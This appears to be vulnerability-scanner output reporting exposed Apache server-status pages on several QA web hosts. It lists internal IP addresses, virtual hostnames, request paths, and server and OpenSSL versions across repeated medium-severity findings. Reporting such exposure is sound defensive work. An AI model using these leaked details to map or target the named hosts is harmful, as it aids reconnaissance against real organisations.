6-0253550/1/340R 0.006030790930.00.0020.52 10.253.106.184http/1.1 7-0276670/0/272_ 0.0080351640.00.0018.56 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 8-0248040/1/232R 0.00604078470.00.006.88 10.253.106.184http/1.1 9-0248050/15/322R 0.0159518593680.00.5832.93 10.253.106.191http/1.1 10-0276680/0/201_ 0.0070264830.00.004.54 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 11-0248060/1/321R 0.005940559090.00.0016.09 10.253.106.191http/1.1 12-0276690/0/364_ 0.0070319460.00.0051.38 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 13-0253570/4/205R 0.0050621306930.00.009.28 10.253.106.191http/1.1 14-0210840/24/287_ 0.0317716191340.00.5331.07 10.253.106.191http/1.1 15-0263880/0/281R 0.0060301220760.00.0021.06 10.253.106.184http/1.1 16-0177537061/7081/7245K 4.35501543812923.913.0314.84 10.253.106.191http/1.1qa1.allergyinsider.com:80GET /server-status?auto HTTP/1.1 17-0276700/0/261_ 0.0040278660.00.0035.54 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 18-0248070/45/275_ 0.322999667830.01.134.21 10.253.106.191http/1.1 19-0276710/0/295_ 0.0030332470.00.0014.89 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 20-0276720/0/189_ 0.0030176810.00.002.61 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 21-0248090/22/239_ 0.1429913303060.00.744.33 10.253.106.191http/1.1 22-0210850/4/178R 0.005930116890.00.022.33 10.253.106.191http/1.1 23-0276750/0/196_ 0.0010186570.00.003.23 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 24-0276760/0/282_ 0.000080570.00.0013.54 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 25-0248100/54/305_ 0.142990289080.00.275.55 10.253.106.191http/1.1 26-0203230/36/317_ 0.061771405603670.01.2015.63 10.253.106.191http/1.1 27-0230268/9/202W 0.0000150077.00.011.37 10.253.106.191http/1.1qa1.unitylabservices.com:80GET /server-status HTTP/1.1 28-0248110/19/260_ 0.13299934253790.00.398.02 10.253.106.191http/1.1 29-0230280/1/225R 0.005749342050.00.0015.68 10.253.106.191http/1.1 30-0276770/0/291_ 0.0000105750.00.0014.77 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 31-0230290/1/276R 0.006040347000.00.0052.95 10.253.106.191http/1.1 32-0203500/84/278R 0.47603212388330.014.4920.48 10.253.106.184http/1.1 33-0263890/2/258R 0.006030341090.00.003.58 10.253.106.191http/1.1 34-0203840/3/190_ 0.0029816108300.00.012.21 10.253.106.184http/1.1 35-0263904/4/215K 0.0080200375.50.0149.25 10.253.106.191http/1.1qa1.unitylabservices.com:80GET / HTTP/1.1 36-0-0/0/207. 0.005940136580.00.002.79 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 37-0248120/0/198R 0.005940133360.00.0014.17 10.253.106.191http/1.1 38-0254076776/6778/6911K 4.13802235712402.312.1122.23 10.253.106.184http/1.1qa1.allergyinsider.com:80GET /server-status?auto HTTP/1.1 39-0248130/0/279R 0.006030226340.00.0010.99 10.253.106.184http/1.1 40-0248140/0/273R 0.005940228700.00.0014.01 10.253.106.191http/1.1 41-0183700/28/228R 0.03506305325930.00.115.04 10.253.106.191http/1.1 42-0248150/14/189R 0.0150611185500.00.042.61 10.253.106.191http/1.1 43-0248160/10/179_ 0.012988140170.00.042.73 10.253.106.184http/1.1 44-0-0/0/192. 0.002940196030.00.0034.32 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 45-0268540/0/197_ 0.002880224240.00.0019.38 10.253.106.184http/1.1 46-0-0/0/137. 0.00591074510.00.001.58 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 47-0-0/0/302. 0.002660179790.00.0023.81 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 48-0253600/31/237_ 0.0529810230050.00.315.16 10.253.106.184http/1.1 49-0-0/0/171. 0.005920163660.00.004.39 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 50-0237013/6/190K 0.012913238274.40.091.44 10.253.106.184http/1.1qa1.allergyinsider.com:80GET /akamai/sureroute-test-object.html HTTP/1.1 51-0268570/0/181_ 0.002690169250.00.0015.10 10.253.106.191http/1.1 52-0237020/56/275R 0.16300121460350.02.536.66 10.253.106.191http/1.1 53-0-0/0/237. 0.00590073770.00.008.79 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 54-0-0/0/308. 0.002950114260.00.0025.03 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 55-0268590/1/225_ 0.001770313420.
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31fed0127cfed0127cf73782e4
Apache Status Apache Server Status for qa1.unitylabservices.com (via 10.253.99.247) Server Version: Apache/2.4.54 (Amazon) Communique/4.2.0 OpenSSL/1.0.2k-fips Server MPM: prefork Server Built: Jul 11 2022 21:47:38 Current Time: Wednesday, 06-Sep-2023 23:14:09 EDT Restart Time: Wednesday, 06-Sep-2023 21:14:08 EDT Parent Server Config. Generation: 1 Parent Server MPM Generation: 0 Server uptime: 2 hours 1 second Server load: 0.00 0.00 0.00 Total accesses: 2041 - Total Traffic: 6.9 MB - Total Duration: 32697 CPU Usage: u1.09 s.8 cu1.39 cs.52 - .0528% CPU load .283 requests/sec - 1001 B/second - 3534 B/request - 16.0201 ms/request 19 requests currently being processed, 27 idle workers KK___....R._R.R.RRRRRR____R___..RR________._R__R_.__....W....... RR......_...._.................................................. ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ .................................................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-030743720/720/720K 0.43904401301.31.271.27 10.253.106.148http/1.1qa1.allergyinsider.com:80GET /server-status?auto HTTP/1.1 1-030744720/720/720K 0.41804211301.21.271.27 10.253.106.135http/1.1qa1.allergyinsider.com:80GET /server-status?auto HTTP/1.1 2-067100/0/16_ 0.00004310.00.000.06 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 3-054540/10/13_ 0.016502870.00.080.08 10.253.106.148http/1.1 4-061310/0/6_ 0.006505930.00.000.02 10.253.106.148http/1.1 5-0-0/0/9. 0.0035501740.00.000.01 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 6-0-0/0/6. 0.00636040.00.000.01 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 7-0-0/0/6. 0.003540830.00.000.00 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 8-0-0/0/44. 0.0063028440.00.000.91 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 9-050830/2/4R 0.0039513580.00.000.00 10.253.106.135http/1.1 10-0-0/0/25. 0.00352017560.00.000.04 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 11-061350/0/5_ 0.0019013560.00.000.01 10.253.106.135http/1.1 12-0307550/15/15R 0.0239532170.00.090.09 10.253.106.135http/1.1 13-0-0/0/3. 0.001930390.00.000.00 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 14-050860/0/2R 0.00662012710.00.000.00 10.253.106.148http/1.1 15-0-0/0/4. 0.0013010.00.000.00 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 16-033570/3/17R 0.0037095050.00.010.20 10.253.106.135http/1.1 17-050880/0/4R 0.00482000.00.000.00 10.253.106.135http/1.1 18-033580/0/13R 0.0039504540.00.000.12 10.253.106.135http/1.1 19-050890/0/5R 0.0064001450.00.000.12 10.253.106.135http/1.1 20-050900/4/10R 0.0065901580.00.010.01 10.253.106.135http/1.1 21-033590/0/4R 0.003950360.00.000.01 10.253.106.135http/1.1 22-033600/9/13_ 0.0132401130.00.040.04 10.253.106.135http/1.1qa1.unitylabservices.com:80GET / HTTP/1.1 23-033610/3/6_ 0.00195102010.00.000.01 10.253.106.148http/1.1qa1.allergyinsider.com:80GET / HTTP/1.1 24-033620/0/2_ 0.00370000.00.000.00 10.253.106.148http/1.1 25-054560/13/14_ 0.0165441860.00.050.05 10.253.106.148http/1.1 26-050910/0/6R 0.006380980.00.000.01 10.253.106.135http/1.1 27-033640/8/9_ 0.0219513300.00.050.05 10.253.106.148http/1.1 28-061360/0/14_ 0.001903280.00.000.41 10.253.106.135http/1.1 29-050920/5/33_ 0.00370195700.00.080.28 10.253.106.148http/1.1qa1.allergyinsider.com:80GET /akamai/sureroute-test-object.html HTTP/1.1 30-0-0/0/4. 0.006590550.00.000.00 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 31-0-0/0/7. 0.0065701130.00.000.05 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 32-050930/0/1R 0.00482000.00.000.00 10.253.106.135http/1.1 33-050940/1/3R 0.00530010.00.000.00 10.253.106.135http/1.1 34-061370/0/3_ 0.0019010.00.000.00 10.253.106.135http/1.1 35-054570/0/7_ 0.003240540.00.000.01 10.253.106.135http/1.1 36-033670/0/1_ 0.00357000.00.000.00 10.253.106.135http/1.1 37-033680/3/4_ 0.003242430.00.010.01 10.253.106.135http/1.1 38-054580/0/6_ 0.00324055600.00.000.04 10.253.106.135http/1.1 39-054590/6/7_ 0.0090070.00.030.03 10.253.106.135http/1.1 40-054600/0/1_ 0.0065000.00.000.00 10.253.106.148http/1.1 41-061450/0/5_ 0.0019020540.00.000.09 10.253.106.135http/1.1 42-0-0/0/6. 0.003220810.00.000.01 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 43-061470/0/18_ 0.001803380.00.000.40 10.253.106.135http/1.1 44-0308440/1/1R 0.00395000.00.000.00 10.253.106.135http/1.1 45-033700/1/6_ 0.00324421900.00.000.01 10.253.106.135http/1.1qa1.unitylabservices.com:80GET /akamai/sureroute-test-object.html HTTP/1.1 46-011990/13/14_ 0.03354116430.00.060.06 10.253.106.135http/1.1 47-056320/0/15R 0.0066201880.00.000.12 10.253.106.148http/1.1 48-020310/6/11_ 0.01324212453300.00.020.44 10.253.106.135http/1.1 49-0-0/0/4. 0.00880580.00.000.00 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 50-012000/3/4_ 0.001816780.00.020.02 10.253.106.135http/1.1 51-056340/11/14_ 0.0119593210.00.010.01 10.253.106.148http/1.1 52-0-0/0/17. 0.006101140.00.000.08 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 53-0-0/0/5. 0.00170380.00.000.04 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 54-0-0/0/3. 0.009730440.00.000.00 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 55-0-0/0/15. 0.006002340.00.000.02 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 56-056389/9/18W 0.000012608.10.010.02 10.253.106.135http/1.1qa1.unitylabservices.com:80GET /server-status HTTP/1.1 57-0-0/0/4. 0.00160140.00.000.02 127.0
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31fed0127cfed0127c05c55784
Apache Status Apache Server Status for qa1.unitylabservices.com (via 10.253.99.247) Server Version: Apache/2.4.54 (Amazon) Communique/4.2.0 OpenSSL/1.0.2k-fips Server MPM: prefork Server Built: Jul 11 2022 21:47:38 Current Time: Sunday, 03-Sep-2023 14:15:59 EDT Restart Time: Friday, 01-Sep-2023 17:23:28 EDT Parent Server Config. Generation: 1 Parent Server MPM Generation: 0 Server uptime: 1 day 20 hours 52 minutes 30 seconds Server load: 0.00 0.01 0.00 Total accesses: 47530 - Total Traffic: 575.0 MB - Total Duration: 1306807 CPU Usage: u11.8 s22.39 cu57.73 cs14.93 - .0661% CPU load .294 requests/sec - 3731 B/second - 12.4 kB/request - 27.4944 ms/request 32 requests currently being processed, 31 idle workers _RKKR_R___R_R_K___R_R_KR___RR___R_________R__RR_.RR....RRR.R_RR. RRRKRW.......................................................... ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ .................................................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-0183320/7/268_ 0.0017416294110.00.014.67 10.253.106.148http/1.1 1-0183330/0/214R 0.004500203430.00.0011.68 10.253.106.135http/1.1 2-02218216155/16155/16155K 9.8980990329448.528.7628.76 10.253.106.148http/1.1qa1.allergyinsider.com:80GET /server-status?auto HTTP/1.1 3-02218316155/16155/16155K 9.1880943229448.828.7628.76 10.253.106.135http/1.1qa1.allergyinsider.com:80GET /server-status?auto HTTP/1.1 4-0195100/0/183R 0.00276097520.00.002.23 10.253.106.148http/1.1 5-098520/2/248_ 0.0016324134270.00.013.92 10.253.106.135http/1.1qa1.allergyinsider.com:80GET /etc/designs/diagnostics/vendor/url-polyfill.min.js HTTP/1. 6-0195110/0/179R 0.002760120670.00.002.80 10.253.106.148http/1.1 7-0195120/0/198_ 0.002750174170.00.002.66 10.253.106.135http/1.1 8-0195770/0/224_ 0.001740107930.00.004.29 10.253.106.148http/1.1 9-0192280/1/296_ 0.001660233540.00.0615.85 10.253.106.148http/1.1qa1.allergyinsider.com:80GET /etc.clientlibs/diagnostics/components/content/resource_lib 10-0142280/10/130R 0.014591160280.00.052.24 10.253.106.135http/1.1 11-0171020/2/135_ 0.001731452250.00.000.83 10.253.106.135http/1.1 12-0171030/0/198R 0.004540103440.00.007.33 10.253.106.135http/1.1 13-0197530/10/189_ 0.04163106150640.00.235.42 10.253.106.148http/1.1qa1.allergyinsider.com:80GET /etc.clientlibs/diagnostics/components/content/e_catalog/cl 14-0171091/11/224K 0.0120348281.00.055.59 10.253.106.148http/1.1qa1.unitylabservices.com:80GET / HTTP/1.1 15-0203680/0/300_ 0.0020323450.00.0020.64 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 16-0117510/2/195_ 0.00172103386680.00.013.28 10.253.106.135http/1.1 17-0203690/0/206_ 0.001068150.00.001.71 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 18-0183340/0/186R 0.00277060980.00.003.98 10.253.106.148http/1.1 19-0197540/0/166_ 0.001740102140.00.002.26 10.253.106.148http/1.1 20-0174970/1/149R 0.00464964310.00.006.03 10.253.106.135http/1.1 21-0192300/0/187_ 0.001660128690.00.002.52 10.253.106.148http/1.1 22-01975525/25/351K 0.051761922195285.40.2821.38 10.253.106.135http/1.1qa1.allergyinsider.com:80GET /ews/exchange/ HTTP/1.1 23-0171130/0/235R 0.004500193520.00.003.24 10.253.106.135http/1.1 24-0203700/0/133_ 0.001082580.00.001.04 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 25-0192320/0/198_ 0.00166079350.00.002.87 10.253.106.148http/1.1 26-0192330/23/250_ 0.2416370189270.03.206.20 10.253.106.135http/1.1qa1.allergyinsider.com:80GET /etc/designs/diagnostics/vendor/bootstrap-multiselect.min.j 27-0171160/1/188R 0.002771246160.00.003.04 10.253.106.148http/1.1 28-0171170/0/173R 0.002770148290.00.006.42 10.253.106.148http/1.1 29-0142320/3/224_ 0.001720150420.00.015.74 10.253.106.135http/1.1 30-0171180/1/286_ 0.0017210425740.00.004.80 10.253.106.135http/1.1 31-0192340/1/164_ 0.00163191190.00.010.82 10.253.106.148http/1.1qa1.allergyinsider.com:80GET /etc.clientlibs/diagnostics/components/structure/commercial 32-088110/31/326R 0.0227741504060.00.0734.52 10.253.106.148http/1.1 33-0192350/12/324_ 0.03174166246150.04.878.60 10.253.106.148http/1.1www-qa.patheon.com:80GET /akamai/sureroute-test-object.html HTTP/1.1 34-0145270/14/175_ 0.01173957440.00.024.98 10.253.106.135http/1.1 35-011230/8/172_ 0.251730150770.00.5215.21 10.253.106.135http/1.1 36-0192360/0/141_ 0.001630120150.00.001.78 10.253.106.148http/1.1 37-0192370/10/178_ 0.0112614103620.00.662.04 10.253.106.148http/1.1qa1.allergyinsider.com:80GET /etc/designs/diagnostics/vendor/fonts/icomoon.woff?axzxrh H 38-0192380/0/184_ 0.001630169690.00.003.36 10.253.106.135http/1.1 39-0192390/0/192_ 0.001440179050.00.009.95 10.253.106.135http/1.1 40-0203710/0/291_ 0.0000128460.00.0019.97 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 41-0192440/0/218_ 0.001430131160.00.003.16 10.253.106.135http/1.1 42-0200470/0/322R 0.004760470780.00.0013.38 10.253.106.148http/1.1 43-0203720/0/214_ 0.0000126920.00.007.95 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 44-0203730/0/273_ 0.0000193440.00.0019.14 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 45-0200480/0/199R 0.004750211750.00.0014.76 10.253.106.148http/1.1 46-0187390/0/231R 0.006640307780.00.0022.67 10.253.106.148http/1.1 47-0203740/0/172_ 0.0000129530.00.002.22 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 48-0-0/0/135. 0.001720169150.00.001.18 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 49-0187420/0/210R 0.006640248500.00.0013.09 10.253.106.135http/1.1 50-0200490/0/164R 0.00475085400.00.001.19 10.253.106.148http/1.1 51-0-0/0/116. 0.002740101350.00.000.96 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 52-0-0/0/177. 0.001650169390.00.003.11 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 53-0-0/0/155. 0.001640149420.00.003.78 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 54-0-0/0/234. 0.00173092030.00.002.72 127.0.0.1http/1.1qa1.allergyinsider.com:80OPT
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31fed0127cfed0127c4bf22257
Apache Status Apache Server Status for qa1.unitylabservices.com (via 10.253.99.247) Server Version: Apache/2.4.54 (Amazon) Communique/4.2.0 OpenSSL/1.0.2k-fips Server MPM: prefork Server Built: Jul 11 2022 21:47:38 Current Time: Thursday, 31-Aug-2023 10:22:29 EDT Restart Time: Wednesday, 30-Aug-2023 20:12:06 EDT Parent Server Config. Generation: 1 Parent Server MPM Generation: 0 Server uptime: 14 hours 10 minutes 23 seconds Server load: 0.07 0.06 0.01 Total accesses: 15848 - Total Traffic: 244.8 MB - Total Duration: 685852 CPU Usage: u4.51 s7.05 cu25.12 cs5.11 - .0819% CPU load .311 requests/sec - 5030 B/second - 15.8 kB/request - 43.2769 ms/request 27 requests currently being processed, 29 idle workers ______KRRRRKK_________R____RRR._RR..W..R....._.R.._.._...R_.RR__ R_.._._K.RRRRR..K............................................... ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ .................................................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-0118470/2/83_ 0.0045164666990.00.1212.22 10.253.106.135http/1.1 1-0148460/0/71_ 0.001760175460.00.002.17 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 2-0111030/10/72_ 0.03451634210.00.560.93 10.253.106.135http/1.1qa1.allergyinsider.com:80GET / HTTP/1.1 3-0148470/0/78_ 0.001750180790.00.001.94 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 4-0148480/0/53_ 0.00175025200.00.000.63 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 5-0148490/0/104_ 0.001740137830.00.003.34 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 6-0322685102/5102/5102K 3.138031329286.09.079.07 10.253.106.148http/1.1qa1.allergyinsider.com:80GET /server-status?auto HTTP/1.1 7-085860/40/81R 0.10762025730.01.231.39 10.253.106.135http/1.1 8-0135210/0/79R 0.00640044480.00.001.31 10.253.106.135http/1.1 9-0138490/0/100R 0.00809089570.00.002.86 10.253.106.135http/1.1 10-0132530/0/66R 0.0045709750.00.000.34 10.253.106.135http/1.1 11-0322735102/5102/5102K 2.938029889286.09.079.07 10.253.106.135http/1.1qa1.allergyinsider.com:80GET /server-status?auto HTTP/1.1 12-080953/11/63K 0.01181726255.40.030.71 10.253.106.135http/1.1qa1-corporate.thermofisher.com:GET /akamai/sureroute-test-object.html HTTP/1.1 13-080960/10/83_ 0.024511673180.00.122.50 10.253.106.135http/1.1qa1.allergyinsider.com:80GET /akamai/sureroute-test-object.html HTTP/1.1 14-0132570/0/84_ 0.00451087140.00.002.00 10.253.106.135http/1.1 15-0148500/0/82_ 0.00174078490.00.002.64 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 16-0138500/0/93_ 0.00112073940.00.007.05 10.253.106.135http/1.1 17-0132590/6/90_ 0.01112085160.00.033.18 10.253.106.135http/1.1 18-0148510/0/70_ 0.00174039570.00.002.30 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 19-0132600/0/74_ 0.001120113360.00.002.33 10.253.106.148http/1.1 20-080970/3/92_ 0.00451338267740.00.063.85 10.253.106.135http/1.1 21-0132610/2/89_ 0.00112057200.00.012.88 10.253.106.148http/1.1 22-070970/49/98R 0.18636048230.02.113.00 10.253.106.135http/1.1 23-0148520/0/52_ 0.00174063120.00.001.10 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 24-0150210/0/105_ 0.0010128850.00.001.77 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 25-0150220/0/53_ 0.000015300.00.002.76 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 26-0150230/0/107_ 0.000049110.00.004.68 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 27-0105730/0/88R 0.00595043710.00.006.94 10.253.106.135http/1.1 28-0138510/0/32R 0.0080901580.00.000.02 10.253.106.135http/1.1 29-081190/20/107R 0.036361684550.01.825.01 10.253.106.135http/1.1 30-0-0/0/69. 0.00805023430.00.001.37 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 31-0118580/11/96_ 0.01112823810.00.582.19 10.253.106.148http/1.1 32-0138520/0/60R 0.008090171820.00.002.91 10.253.106.148http/1.1 33-0135230/12/63R 0.01633017530.01.962.97 10.253.106.135http/1.1 34-0-0/0/73. 0.0011120172350.00.000.71 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 35-0-0/0/77. 0.0011850202470.00.000.65 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 36-01326612/24/78W 0.05001623723.00.121.24 10.253.106.135http/1.1qa1.unitylabservices.com:80GET /server-status HTTP/1.1 37-0-0/0/72. 0.00592049800.00.001.07 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 38-0-0/0/78. 0.00802052690.00.001.02 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 39-0138530/0/57R 0.008090138190.00.000.73 10.253.106.148http/1.1 40-0-0/0/124. 0.0011630162640.00.008.10 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 41-0-0/0/84. 0.008060148000.00.003.72 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 42-0-0/0/99. 0.004550329700.00.006.07 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 43-0-0/0/63. 0.00449045610.00.000.69 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 44-0-0/0/65. 0.001111067440.00.006.53 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 45-0124310/17/119_ 0.041270136680.01.332.93 10.253.106.148http/1.1 46-0-0/0/51. 0.00593021410.00.004.48 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 47-099020/13/120R 0.016400275300.00.446.08 10.253.106.135http/1.1 48-0-0/0/72. 0.001220030760.00.001.42 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 49-0-0/0/61. 0.001068077130.00.000.39 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 50-099030/2/49_ 0.0045111455450.00.012.51 10.253.106.135http/1.1 51-0-0/0/137. 0.0011830319240.00.0022.60 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 52-0-0/0/57. 0.00447078800.00.000.70 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 53-0118640/21/74_ 0.031121798440.00.433.29 10.253.106.148http/1.1 54-0-0/0/87. 0.001114028190.00.001.72 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 55-0-0/0/62
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31fed0127cfed0127c76d2cb7a
Apache Status Apache Server Status for qa1.unitylabservices.com (via 10.253.99.247) Server Version: Apache/2.4.54 (Amazon) Communique/4.2.0 OpenSSL/1.0.2k-fips Server MPM: prefork Server Built: Jul 11 2022 21:47:38 Current Time: Tuesday, 29-Aug-2023 21:05:39 EDT Restart Time: Tuesday, 29-Aug-2023 13:09:37 EDT Parent Server Config. Generation: 1 Parent Server MPM Generation: 0 Server uptime: 7 hours 56 minutes 2 seconds Server load: 0.20 0.06 0.02 Total accesses: 13293 - Total Traffic: 169.4 MB - Total Duration: 709180 CPU Usage: u4.49 s4.8 cu13.86 cs4.94 - .0983% CPU load .465 requests/sec - 6.1 kB/second - 13.1 kB/request - 53.3499 ms/request 40 requests currently being processed, 32 idle workers KKKKRW_R_KRRRR__K__RKK_K__RRRRKR___K_RR___KK_____RR__K_RRK_KK___ ___..K.....R......._..R...........R............................. ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ .................................................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-053062856/2856/2856K 1.638016795181.25.065.06 10.253.106.135http/1.1qa1.allergyinsider.com:80GET /server-status?auto HTTP/1.1 1-053072856/2856/2856K 1.768017835181.15.065.06 10.253.106.148http/1.1qa1.allergyinsider.com:80GET /server-status?auto HTTP/1.1 2-013641/15/109K 0.12861225616370.50.401.81 10.253.106.135http/1.1qa1.thermofisher.in:80GET /etc/designs/fishersci/clientlibs/common.min.2020.1.0.js HT 3-056401/1/130K 0.00862763211.40.002.11 10.253.106.135http/1.1qa1.thermofisher.in:80GET /chemicals/en/brands/thermo-scientific.globalconfig.js HTTP 4-0238710/64/91R 0.37326089530.01.002.55 10.253.106.148http/1.1 5-0564111/17/125W 0.17003338152.50.495.93 10.253.106.135http/1.1qa1.unitylabservices.com:80GET /server-status HTTP/1.1 6-063070/0/128_ 0.002900149290.00.001.63 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 7-056420/0/126R 0.00432077250.00.002.39 10.253.106.135http/1.1 8-065020/0/78_ 0.0085070670.00.002.06 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 9-013675/34/166K 0.10241101238869.11.133.82 10.253.106.148http/1.1qa1.thermofisher.in:80GET /etc/designs/fishersci/clientlibs/headlibs.min.2021.10.0.js 10-056430/0/63R 0.00432061220.00.000.21 10.253.106.135http/1.1 11-056440/0/88R 0.00432043910.00.001.30 10.253.106.135http/1.1 12-056450/0/85R 0.00330069270.00.000.60 10.253.106.135http/1.1 13-056460/0/153R 0.00330092460.00.001.80 10.253.106.135http/1.1 14-059160/0/101_ 0.00156052470.00.001.24 10.253.106.148http/1.1 15-059170/0/83_ 0.00155079430.00.001.64 10.253.106.135http/1.1 16-023791/1/124K 0.002470181436.20.0117.70 10.253.106.135http/1.1qa1.thermofisher.in:80GET /etc/designs/fishersci/clientlibs/tabletlibs.min.2021.10.0. 17-059180/0/72_ 0.001550101870.00.001.48 10.253.106.135http/1.1 18-063080/0/125_ 0.00289080550.00.003.59 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 19-0284590/65/86R 0.26327086810.00.810.83 10.253.106.148http/1.1 20-0138713/42/87K 